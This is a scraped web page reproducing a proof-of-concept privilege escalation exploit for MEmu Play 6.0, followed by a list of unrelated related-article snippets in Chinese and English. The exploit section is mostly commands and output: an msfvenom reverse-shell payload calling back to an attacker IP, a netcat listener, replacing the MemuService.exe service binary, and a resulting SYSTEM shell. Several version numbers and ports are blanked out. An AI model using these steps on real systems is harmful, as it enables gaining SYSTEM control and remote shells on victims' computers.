# Exploit Title: Memu Play 6.0. - Privilege Escalation (PoC)

# Date: //

# Author: Alejandra Sánchez

# Vendor Homepage: https://www.memuplay.com/

# Software Link: https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release

# Version: 6.0.

# Tested on: Windows  / Windows 

# Description:

#  Memu Play 6.0. suffers from Privilege Escalation due to insecure file permissions

# Prerequisites

# Local, Low privilege access with restart capabilities

# Details

# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.

# A low privilege account is able to rename the MemuService.exe file located in this same path and replace

# with a malicious file that would connect back to an attacking computer giving system level privileges

# (nt authority\system) due to the service running as Local System.

# While a low privilege user is unable to restart the service through the application, a restart of the

# computer triggers the execution of the malicious file.

C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"

C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F)

                                                      BUILTIN\Administrators:(I)(F)

                                                      BUILTIN\Users:(I)(F)

                                                      NT AUTHORITY\SYSTEM:(I)(F)

Successfully processed  files; Failed processing  files

C:\>sc qc MEmuSVC

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MEmuSVC

        TYPE               :   WIN32_OWN_PROCESS

        START_TYPE         :    AUTO_START

        ERROR_CONTROL      :    NORMAL

        BINARY_PATH_NAME   : C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe

        LOAD_ORDER_GROUP   :

        TAG                : 

# Proof of Concept

. Generate malicious .exe on attacking machine

    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT= -f exe > /var/www/html/MemuService.exe

. Setup listener and ensure apache is running on attacking machine

    nc -lvp

    service apache2 start

. Download malicious .exe on victim machine

    Open browser to http://192.168.1.130/MemuService.exe and download

. Overwrite file and copy malicious .exe.

    Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak

    Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\

. Restart victim machine

. Reverse Shell on attacking machine opens

    C:\Windows\system32>whoami

    whoami

    nt authority\system

[EXP]Memu Play 6.0.7 - Privilege Escalation的更多相关文章

  1. [EXP]Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation

    Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master) Platform: Windows (not tested ...

  2. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  3. Linux/Unix System Level Attack、Privilege Escalation(undone)

    目录 . How To Start A System Level Attack . Remote Access Attack . Local Access Attack . After Get Roo ...

  4. FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit

    /* * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit * Author by CurcolHekerLink * * Th ...

  5. Basic Linux Privilege Escalation

    (Linux) privilege escalation is all about: Collect - Enumeration, more enumeration and some more enu ...

  6. CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://ha ...

  7. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

  8. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

  9. [EXP]Microsoft Windows 10 - XmlDocument Insecure Sharing Privilege Escalation

    Windows: XmlDocument Insecure Sharing Elevation of Privilege Platform: Windows (almost certainly ear ...

随机推荐

  1. 【笔记】计算机原理,网络,Linux操作系统

    一,计算机原理 1,化繁为简的思想,产生二进制,产生把所有计算归结为加法运算 二,网络 1,分层思想,产生ISO七层协议,商用了TCP/IP的五层协议 三,Linux操作系统 1,分层思想,硬件-&g ...

  2. java集合框架(1) hashMap 简单使用以及深度分析(转)

    java.util 类 HashMap<K,V>java.lang.Object  java.util.AbstractMap<K,V>      java.util.Hash ...

  3. 牛客练习赛42(A,B)

    A:链接:https://ac.nowcoder.com/acm/contest/393/A 时间限制:C/C++ 1秒,其他语言2秒 空间限制:C/C++ 262144K,其他语言524288K 6 ...

  4. 【python深入】collections-Counter使用总结

    关于collections的使用,首先介绍:Counter的使用 需要执行:from collections import Counter 在很多使用到dict和次数的场景下,Python中用Coun ...

  5. 37 【kubernetes】搭建dashboard

    官方的操作步骤是:https://github.com/kubernetes/dashboard 我自己的步骤是: 1,下载yaml文件 wget https://raw.githubusercont ...

  6. maven小结

    1.首先要安装maven,我的在: F:\apache-maven-3.0.4 2.手动创建本地仓库的地址为:F:\.m2\repository 3.从windows的环境变量中增加了:M2_HOME ...

  7. 交叉编译bash

    1 下载bash版本:[version 4.2.53]地址:http://ftp.gnu.org/gnu/bash/ 2 解压将下载的bash压缩包解压,命令: # mkdir /home/carri ...

  8. centos平台基于snort、barnyard2以及base的IDS(入侵检测系统)的搭建与测试及所遇问题汇总

    centos平台基于snort.barnyard2以及base的IDS(入侵检测系统)的搭建与测试及所遇问题汇总 原创 2016年12月19日 01:20:03 标签: centos / snort  ...

  9. 探索未知种族之osg类生物---呼吸分解之渲染遍历二

    那么今天我们就正式进入osg整个呼吸动作之中最复杂的一个动作,ViewerBase::renderingTraversals(),我们先介绍renderingTraversals的开头的简单的几步操作 ...

  10. [BeijingWc2008]雷涛的小猫

    --BZOJ1270 Description 雷涛的小猫雷涛同学非常的有爱心,在他的宿舍里,养着一只因为受伤被救助的小猫(当然,这样的行为是违反学生宿舍管理条例的). 在他的照顾下,小猫很快恢复了健康 ...